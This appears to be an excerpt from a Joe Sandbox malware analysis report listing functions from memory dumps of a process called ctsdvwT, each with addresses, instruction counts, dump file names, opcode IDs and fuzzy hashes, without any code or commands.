                                        Function 03088C50 Relevance: .1, Instructions: 81COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eaf138e3cccc92bd6705c39bb58791069aa1462477212ba782c60dd0f4e3b53c
                                        • Instruction ID: 99c45f6a4927d0f646d271b5d4e7d3a1de53028420a6384e0b6a5519e05b6f9f
                                        • Opcode Fuzzy Hash: eaf138e3cccc92bd6705c39bb58791069aa1462477212ba782c60dd0f4e3b53c
                                        • Instruction Fuzzy Hash: 6021B131E023199BCB15EF64C85059EBBF6EF85300F54C56AE851EB255DB71A845CB40
                                        Function 030816B0 Relevance: .1, Instructions: 80COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 888d011195d714d0c30ccc8621b9922b14535ad3fa23e97ba5420a2f735be090
                                        • Instruction ID: 111b54db671ee8f86eed8fbba3bfbd255aface7def8f824d226f806cf73266d5
                                        • Opcode Fuzzy Hash: 888d011195d714d0c30ccc8621b9922b14535ad3fa23e97ba5420a2f735be090
                                        • Instruction Fuzzy Hash: 4521E230201102ABDB75FB3CF98876A37AAFF85340F144965D489CB256DB2EDC468B91
                                        Function 03081380 Relevance: .1, Instructions: 79COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 084f9c6deee790becbdd1212c6afc394e0f74509d1d8a3e7f686f0cbd7d99114
                                        • Instruction ID: 6b7d3ddbfe21b4fe43313cd40d6f3822c57de2e3cc223cc2e8b6d52834119048
                                        • Opcode Fuzzy Hash: 084f9c6deee790becbdd1212c6afc394e0f74509d1d8a3e7f686f0cbd7d99114
                                        • Instruction Fuzzy Hash: 4921DA706022014BDB78F76CF44832D3799EF46325F1848A5D44AC7782DB299C8A8786
                                        Function 03088D60 Relevance: .1, Instructions: 78COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f8f3283fd4b62329aec7622f85108d542f0f43f4d2215cf95edf6c50e5cba17f
                                        • Instruction ID: baa9b88d38ad9daf811566ced4e8d912d167edc1cdc7dc03fd17882d521dfbf5
                                        • Opcode Fuzzy Hash: f8f3283fd4b62329aec7622f85108d542f0f43f4d2215cf95edf6c50e5cba17f
                                        • Instruction Fuzzy Hash: E0218B31E0120A9BCB15DFA8D99069EF7B6FF89314F54C61AE845AB240DB719886CB80
                                        Function 0157D01C Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4180819262.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_157d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 307bb08e9cc6a56bfe202b23f81e83d07cb8eccf13a91854fff7212c206c74c8
                                        • Instruction ID: df662ccd6b639bddbd21f8e19e19d177fbf48d68d7b5bd4544c354f3ac514fd3
                                        • Opcode Fuzzy Hash: 307bb08e9cc6a56bfe202b23f81e83d07cb8eccf13a91854fff7212c206c74c8
                                        • Instruction Fuzzy Hash: 9A210075604240DFDB16DF54E980B26BBB1FF84314F20C96DD80A4F242D33AD407CA62
                                        Function 03084F98 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4ddea0fa8cf916b8c28d16c576e2528168e0b9bb2f276fdb01bd0d3c377627de
                                        • Instruction ID: acbfca573afe0e7cd027beae9b1b9f1ca178c4c6d67c2db04c7bfc3c65c40153
                                        • Opcode Fuzzy Hash: 4ddea0fa8cf916b8c28d16c576e2528168e0b9bb2f276fdb01bd0d3c377627de
                                        • Instruction Fuzzy Hash: 67212734701205CFDB64EB78D958AADBBF1EF89304B1404A8E446EB3A5DB369D05CB91
                                        Function 03081898 Relevance: .1, Instructions: 70COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f5944d5fa9b7bbb7dfcf269b5b9a126ba564dc48683740fb8d06326691efe2fb
                                        • Instruction ID: b0f060b82a21f5411e5be7888d995ccb01ddc75598e4db8991a22566b63aba19
                                        • Opcode Fuzzy Hash: f5944d5fa9b7bbb7dfcf269b5b9a126ba564dc48683740fb8d06326691efe2fb
                                        • Instruction Fuzzy Hash: B8213234701215DFDB68FB78D55569E77F5AF89240F1404B8C186EB390DB369D02CBA2
                                        Function 03088C60 Relevance: .1, Instructions: 70COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5a341bd16f90f0e906b0c4aec6fc22249f8c81c2d9ffafed1b06e9ade0ab5537
                                        • Instruction ID: f2f207070c39a8e07e196a7e4a28e709b9e537189b4c9e1bc6b0dcfe3c8ef751
                                        • Opcode Fuzzy Hash: 5a341bd16f90f0e906b0c4aec6fc22249f8c81c2d9ffafed1b06e9ade0ab5537
                                        • Instruction Fuzzy Hash: AF217C31E01209DBCB18DFA4C45059EB7F6AF89304F54C62AE855FB354EB71A845CB50
                                        Function 030816C0 Relevance: .1, Instructions: 69COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d8ab32f4161f52ae4689110bf365683d8ab817f4fa5aca227a2ccadf856aa611
                                        • Instruction ID: aa9baec5dfcb5eec6fb0a48b7a05c034f498e45c88b3352d466d587c92c82be5
                                        • Opcode Fuzzy Hash: d8ab32f4161f52ae4689110bf365683d8ab817f4fa5aca227a2ccadf856aa611
                                        • Instruction Fuzzy Hash: AB21CF30301102ABEB75FB38F88875A33AAFB88344F045A64D449C7255DB3E9C468B91
                                        Function 0308188B Relevance: .1, Instructions: 69COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 36468efb2dc3ed8c6c6c35296f441b5e8e06f43f6f1515816ee0c46b28b945e4
                                        • Instruction ID: c0d43d8de6eaaed4795edcb0bfe849e5c0338ecd0d2f1fa9055741a4e89f175c
                                        • Opcode Fuzzy Hash: 36468efb2dc3ed8c6c6c35296f441b5e8e06f43f6f1515816ee0c46b28b945e4
                                        • Instruction Fuzzy Hash: AF216034B01215DFDB68EB38D5556AEB7F5AF49340F1404A8C186EB390DB369C02CBA2
                                        Function 03084FA8 Relevance: .1, Instructions: 68COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3592e6adc691f6734091e9de6a6bac2a01cada3d424cfa26bb12af6029636e7d
                                        • Instruction ID: e1146ed4fdd73fc594cd93062fc4487e4bdec8dac476e06722538d29559cd291
                                        • Opcode Fuzzy Hash: 3592e6adc691f6734091e9de6a6bac2a01cada3d424cfa26bb12af6029636e7d
                                        • Instruction Fuzzy Hash: 5A211634701205CFDB64EB78D958AAEB7F1EF89204B1004A8E446EB3A0DB369D05CBA1
                                        Function 0157D006 Relevance: .1, Instructions: 62COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4180819262.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_157d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 995c5e78081a2af74cb34dbdb397716b598aea86208d1632702c71d5c884642c
                                        • Instruction ID: 00b1c1e461fb2aa231e1515e430ff839490efe73cc400a96fb4225648585f6d8
                                        • Opcode Fuzzy Hash: 995c5e78081a2af74cb34dbdb397716b598aea86208d1632702c71d5c884642c
                                        • Instruction Fuzzy Hash: 0A2168755093808FCB03CF24D990B15BF71BF46214F28C5EAD8498F6A7D33A980ACB62
                                        Function 0308149C Relevance: .1, Instructions: 62COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d14e70a9c2bd7266586e1915e5c6580e1ee2f958071190fe5cd21d7b7c1bc86d
                                        • Instruction ID: d0f17b5031f3ed723c3471442ab4586b0332940894a41a5cde0c2a4a6c5f3d16
                                        • Opcode Fuzzy Hash: d14e70a9c2bd7266586e1915e5c6580e1ee2f958071190fe5cd21d7b7c1bc86d
                                        • Instruction Fuzzy Hash: 28114C35A022159FCF65FFB888542AEB7F6AF88210B154479D846EB302E731C8468BA5
                                        Function 03080848 Relevance: .1, Instructions: 62COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f06c36990f6ae23b58d0db41624b1259ac6e422c803db2aa7e466138ff7acdaf
                                        • Instruction ID: ebfbc75db084627ed8a4c27579fa722b3c9a67e8778c1a1674868e9041bf7706
                                        • Opcode Fuzzy Hash: f06c36990f6ae23b58d0db41624b1259ac6e422c803db2aa7e466138ff7acdaf
                                        • Instruction Fuzzy Hash: 50116330702206EBEFA4F779D81836972D9FB85214F148D69D4C6CF241DA25CCD98BC1
                                        Function 030817D0 Relevance: .1, Instructions: 61COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2d923a2c21027223da2937a6103f39d9b28f228054f5c917c8b48dc533a9e22a
                                        • Instruction ID: 434faee56d22d4bd12981675d9a35ebef325cef5e63737dab8b11258734e090a
                                        • Opcode Fuzzy Hash: 2d923a2c21027223da2937a6103f39d9b28f228054f5c917c8b48dc533a9e22a
                                        • Instruction Fuzzy Hash: DA1125B6F00215DBCB64EB78A80D65F7BEAFF48254F150865E945D3340EB3AC8068791
                                        Function 03080838 Relevance: .1, Instructions: 60COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6727defbc57e706730b2ba2cc84da195fa7cf2f1453b57a5c080d3af4f95c794
                                        • Instruction ID: e00f208a9f14480cf3bb54e37db719c9c4bb1f0bdcf1c19b6481c507129bfc8e
                                        • Opcode Fuzzy Hash: 6727defbc57e706730b2ba2cc84da195fa7cf2f1453b57a5c080d3af4f95c794
                                        • Instruction Fuzzy Hash: 1611A730B02206EBEFA4F775D80836972D9E785214F248C7AD4C6CF242EA25C8D98BC1
                                        Function 030814A8 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16a7fdf365f0bd1116d08c7708c6d3986de2511fd7469f87b8fc3f452587af05
                                        • Instruction ID: fc40469e2572dc571137fbbdfe4c643e2d3dd84e62daf11df725ab2ae6839ddd
                                        • Opcode Fuzzy Hash: 16a7fdf365f0bd1116d08c7708c6d3986de2511fd7469f87b8fc3f452587af05
                                        • Instruction Fuzzy Hash: C6016D35A02215DFCF65FFB984542AEBBF5EF88210B144479D84AEB301E735C8428BD5
                                        Function 03089398 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 32370909ece89f65132f7ca98e4efb5efd3c3ae255f2eee72ba5290ddd887bf4
                                        • Instruction ID: 02a46c3daab0b3001f4a428b453bfb33a65eb94c01669f7c30b00a0f4b7e90b0
                                        • Opcode Fuzzy Hash: 32370909ece89f65132f7ca98e4efb5efd3c3ae255f2eee72ba5290ddd887bf4
                                        • Instruction Fuzzy Hash: 4A01B130A002058BDB14FF95D984B9AB7B6FFC5710F548264D84C6F29AEBB0E905CBA1
                                        Function 03087BF0 Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f2dd13e24ccdbbdd79c13c38f22da4e47625e312a360f48fb4d571cd678b8cac
                                        • Instruction ID: b7ef3dcdc26a2889a6a8c69120d6edaf3c1d04cd3c647316ec2115747b477925
                                        • Opcode Fuzzy Hash: f2dd13e24ccdbbdd79c13c38f22da4e47625e312a360f48fb4d571cd678b8cac
                                        • Instruction Fuzzy Hash: F4018430A0134AEFDB01FBB8FD9455D7BF1FB85300B1051A9C4089B195DA371E089792
                                        Function 03081534 Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aa4311071359ccf61b4d00fdd253815a8174d4025681d6fd5db56c5fc09c189f
                                        • Instruction ID: e638be6ad370d8b9cd8a6ba92a1a07b1debb29885f2f36fe7ca1ad8e88528e25
                                        • Opcode Fuzzy Hash: aa4311071359ccf61b4d00fdd253815a8174d4025681d6fd5db56c5fc09c189f
                                        • Instruction Fuzzy Hash: F4F0F677A07210DBD716EBA494501ACBBB1EE881117184097D886DF712D335D447C751
                                        Function 03087C00 Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 760f22181d445bcbc437bf17ab8ed74451382f09a3642062fbe396468585780e
                                        • Instruction ID: fe7ee15d81831942612e02a1aa78270cb65a52f3261b007119d3323f3c4bca96
                                        • Opcode Fuzzy Hash: 760f22181d445bcbc437bf17ab8ed74451382f09a3642062fbe396468585780e
                                        • Instruction Fuzzy Hash: 68F0EC30A0020BEFDB44FBB8FD8859D77F6FB84700F505668C4099B254EB3A6E598B91
                                        Function 03086C1C Relevance: .0, Instructions: 12COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.4183638650.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_3080000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e843fd55f53f12185835c7a13ba6e13fcd5882971c3af34308f1da15e75d39e1
                                        • Instruction ID: 81ab298347eb9e860b90675895e5ec79a32111b8757850d2939de25e8a85250c
                                        • Opcode Fuzzy Hash: e843fd55f53f12185835c7a13ba6e13fcd5882971c3af34308f1da15e75d39e1
                                        • Instruction Fuzzy Hash: DCC012363140504F8501E728E0544B837B1DBCA1293140096D144CF322CE125802CB00